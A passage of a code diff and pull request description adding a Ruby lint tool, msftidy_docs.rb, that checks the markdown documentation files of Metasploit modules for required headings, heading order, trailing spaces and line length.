+    puts "#{@full_filepath}#{line_msg} - [#{'FIXED'.green}] #{cleanup_text(txt)}"
+  end
+
+  #
+  # Display an info message. Info messages do not alter the exit status.
+  #
+  def info(txt, line=0)
+    return if SUPPRESS_INFO_MESSAGES
+    line_msg = (line>0) ? ":#{line}" : ''
+    puts "#{@full_filepath}#{line_msg} - [#{'INFO'.cyan}] #{cleanup_text(txt)}"
+  end
+
+  ##
+  #
+  # The functions below are actually the ones checking the source code
+  #
+  ##
+
+  def has_module
+    module_filepath = @full_filepath.sub('documentation/','').sub('/exploit/', '/exploits/')
+    found = false
+    ['.rb', '.py', '.go'].each do |ext|
+      if File.file? module_filepath.sub(/.md$/, ext)
+        found = true
+        break
+      end
+    end
+    unless found
+      error("Doc missing module.  Check file name and path(s) are correct. Doc: #{@full_filepath}")
+    end
+  end
+
+  def check_start_with_vuln_app
+    unless @lines.first =~ /^## Vulnerable Application$/
+      warn('Docs should start with ## Vulnerable Application')
+    end 
+  end
+
+  def has_h2_headings
+    has_vulnerable_application = false
+    has_verification_steps = false
+    has_scenarios = false
+    has_options = false
+    has_bad_description = false
+    has_bad_intro = false
+
+    @lines.each do |line|
+      if line =~ /^## Vulnerable Application$/
+        has_vulnerable_application = true
+        next
+      end
+
+      if line =~ /^## Verification Steps$/
+        has_verification_steps = true
+        next
+      end
+
+      if line =~ /^## Scenarios$/
+        has_scenarios = true
+        next
+      end
+
+      if line =~ /^## Options$/
+        has_options = true
+        next
+      end
+
+      if line =~ /^## Description$/
+        has_bad_description = true
+        next
+      end
+
+      if line =~ /^## (Intro|Introduction)$/
+        has_bad_intro = true
+        next
+      end
+    end
+
+    unless has_vulnerable_application
+      warn('Missing Section: ## Vulnerable Application')
+    end
+
+    unless has_verification_steps
+      warn('Missing Section: ## Verification Steps')
+    end
+
+    unless has_scenarios
+      warn('Missing Section: ## Scenarios')
+    end
+
+    unless has_options
+      warn('Missing Section: ## Options')
+    end
+
+    unless has_bad_description
+      warn('Descriptions should be within Vulnerable Application, or an H3 sub-section of Vulnerable Application')
+    end
+
+    unless has_bad_intro
+      warn('Intro/Introduction should be within Vulnerable Application, or an H3 sub-section of Vulnerable Application')
+    end
+  end
+
+  def check_newline_eof
+    if @source !~ /(?:\r\n|\n)\z/m
+      warn('Please add a newline at the end of the file')
+    end
+  end
+
+  # This checks that the H2 headings are in teh right order.
+  def h2_order
+    unless @source =~ /^## Vulnerable Application$.+^## Verification Steps$.+^## Options$.+^## Scenarios$/m
+      warn('H2 headings in incorrect order.  Should be: Vulnerable Application, Verification Steps, Options, Scenarios')
+    end
+  end
+
+  def line_checks
+    idx = 0
+    @lines.each do |ln|
+      idx += 1
+
+      if ln =~ /[ \t]$/
+        warn("Spaces at EOL", idx)
+      end
+
+      if ln =~ /^# /
+        warn("No H1 (#) headers.  If this is code, indent.", idx)
+      end
+
+      l = 140
+      if ln.length > l
+        warn("Line too long (#{ln.length}).  Consider a newline (which resolves to a space in markdown) to break it up around #{l} characters.", idx)
+      end
+
+    end
+  end
+
+  #
+  # Run all the msftidy checks.
+  #
+  def run_checks
+    has_module
+    check_start_with_vuln_app
+    has_h2_headings
+    check_newline_eof
+    h2_order
+    line_checks
+  end
+
+  private
+
+  def load_file(file)
+    f = open(file, 'rb')
+    @stat = f.stat
+    buf = f.read(@stat.size)
+    f.close
+    return buf
+  end
+
+  def cleanup_text(txt)
+    # remove line breaks
+    txt = txt.gsub(/[\r\n]/, ' ')
+    # replace multiple spaces by one space
+    txt.gsub(/\s{2,}/, ' ')
+  end
+end
+
+##
+#
+# Main program
+#
+##
+
+if __FILE__ == $PROGRAM_NAME
+  dirs = ARGV
+
+  @exit_status = 0
+
+  if dirs.length < 1
+    $stderr.puts "Usage: #{File.basename(__FILE__)} <directory or file>"
+    @exit_status = 1
+    exit(@exit_status)
+  end
+
+  dirs.each do |dir|
+    begin
+      Find.find(dir) do |full_filepath|
+        next if full_filepath =~ /\.git[\x5c\x2f]/
+        next unless File.file? full_filepath
+        next unless File.extname(full_filepath) == '.md'
+        msftidy = MsftidyDoc.new(full_filepath)
+        # Executable files are now assumed to be external modules
+        # but also check for some content to be sure
+        next if File.executable?(full_filepath) && msftidy.source =~ /require ["']metasploit["']/
+        msftidy.run_checks
+        @exit_status = msftidy.status if (msftidy.status > @exit_status.to_i)
+      end
+    rescue Errno::ENOENT
+      $stderr.puts "#{File.basename(__FILE__)}: #{dir}: No such file or directory"
+    end
+  end
+
+  exit(@exit_status.to_i)
+end

--- a/tools/dev/msftidy_docs.rb
+++ b/tools/dev/msftidy_docs.rb
@@ -199,8 +199,14 @@ class MsftidyDoc
 
   def line_checks
     idx = 0
+    in_codeblock = false
+
     @lines.each do |ln|
       idx += 1
+
+      if ln.scan(/```/).length.odd?
+        in_codeblock = !in_codeblock
+      end
 
       if ln =~ /[ \t]$/
         warn("Spaces at EOL", idx)
@@ -211,7 +217,7 @@ class MsftidyDoc
       end
 
       l = 140
-      if ln.length > l
+      if ln.length > l && !in_codeblock
         warn("Line too long (#{ln.length}).  Consider a newline (which resolves to a space in markdown) to break it up around #{l} characters.", idx)
       end
 

--- a/tools/dev/msftidy_docs.rb
+++ b/tools/dev/msftidy_docs.rb
@@ -208,7 +208,8 @@ class MsftidyDoc
         in_codeblock = !in_codeblock
       end
 
-      if ln =~ /[ \t]$/
+      # find spaces at EOL not in a code block which is ``` or starts with four spaces
+      if !in_codeblock && ln =~ /[ \t]$/ && !(ln =~ /^    /)
         warn("Spaces at EOL", idx)
       end
 

--- a/tools/dev/msftidy_docs.rb
+++ b/tools/dev/msftidy_docs.rb
@@ -175,11 +175,11 @@ class MsftidyDoc
       warn('Missing Section: ## Options')
     end
 
-    unless has_bad_description
+    if has_bad_description
       warn('Descriptions should be within Vulnerable Application, or an H3 sub-section of Vulnerable Application')
     end
 
-    unless has_bad_intro
+    if has_bad_intro
       warn('Intro/Introduction should be within Vulnerable Application, or an H3 sub-section of Vulnerable Application')
     end
   end


### PR DESCRIPTION
This PR adds a new tool: `msftidy_docs.rb`
It acts like `msftidy` but is for docs.
Part of the greater cleanup: #12853 and partially implements https://github.com/rapid7/metasploit-framework/pull/12831#issuecomment-577292896

Right now it checks for the following things:

1. Checks to make sure the doc has a corresponding rb/py/go module
2. checks ## Vulnerable Application is the first line
3. checks to make sure Vulnerable Application, Verification Steps, Scenarios, Options are all present.
4. Checks if Description or Intro/Introduction are present and recommends moving them under Vulnerable Application
5. Checks newline at end of file
6. Checks the H2s mentioned in 3 are in the right order (@tperry-r7 should it be OK to be missing a section, or all all required? Right now i have all required)
7. checks for spaces EOL (when not in ``` or 4x[:space:])
8. Checks that there are no H1s
9. Checks line length and suggests cutting it at 140 (arbitrary number I picked, up for debate)

